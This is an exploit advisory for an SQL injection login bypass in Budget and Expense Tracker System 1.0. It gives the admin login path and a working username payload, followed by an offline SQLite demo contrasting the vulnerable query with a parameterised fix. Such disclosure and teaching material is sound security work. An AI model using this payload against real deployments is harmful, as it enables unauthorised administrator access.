
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, Windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Budget and Expense Tracker System 1.0 is prone to a trivial authentication bypass on the admin login form.
The submitted username is spliced into the login query without sanitisation, so the SQL injection payload
below satisfies the username check for the admin row and lets the attacker log in with the admin account
without knowing its password.

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/expense_budget/admin/login.php

Username: admin' or ''=' -- 
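
The following is an added example, not part of the original advisory and not the vendor's code. It reproduces the
mechanics of the payload offline against an in-memory SQLite table: the assumed shape of the vulnerable login
query (username and password concatenated straight into the SQL) and the users table layout are assumptions,
and the admin row is constructed sample data. The payload yields

    WHERE username = 'admin' or ''=' -- ' AND password = '...'

which the parser reads as username = 'admin' OR ('' = ' -- ' AND password = '...'), true for the admin row whatever
the password. The hardened login shown beside it is the generic fix (a parameterised query), not the vendor's patch.

```python
import sqlite3

# Payload from the PoC above; trailing space kept as written.
PAYLOAD = "admin' or ''=' -- "


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin user with a secret password.
    The (username, password) column layout is an assumption about the app."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Assumed shape of the vulnerable login query: user input spliced into SQL."""
    return (
        "SELECT id, username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Runs the concatenated query; returns the matched (id, username) row or None."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: bound parameters, so the payload is only ever a literal username."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def demo() -> dict:
    """Exercise both login paths with a correct password, a wrong one, and the payload."""
    conn = make_db()
    return {
        "vuln_correct": login_vulnerable(conn, "admin", "S3cret!"),
        "vuln_wrong_pw": login_vulnerable(conn, "admin", "wrong"),
        # Bypass: admin row returned although the password is wrong.
        "vuln_injected": login_vulnerable(conn, PAYLOAD, "whatever"),
        # Same payload against the parameterised query: no row.
        "fixed_injected": login_fixed(conn, PAYLOAD, "whatever"),
        "fixed_correct": login_fixed(conn, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, "whatever"))
    for name, row in demo().items():
        print(f"{name}: {row}")
```

Note that the `--` in the payload never acts as a comment here: it lands inside the string literal ' -- ' created by the
application's own closing quote. The bypass works because of the OR, not the comment, which is why it also succeeds
against a query that hashes the password before comparison.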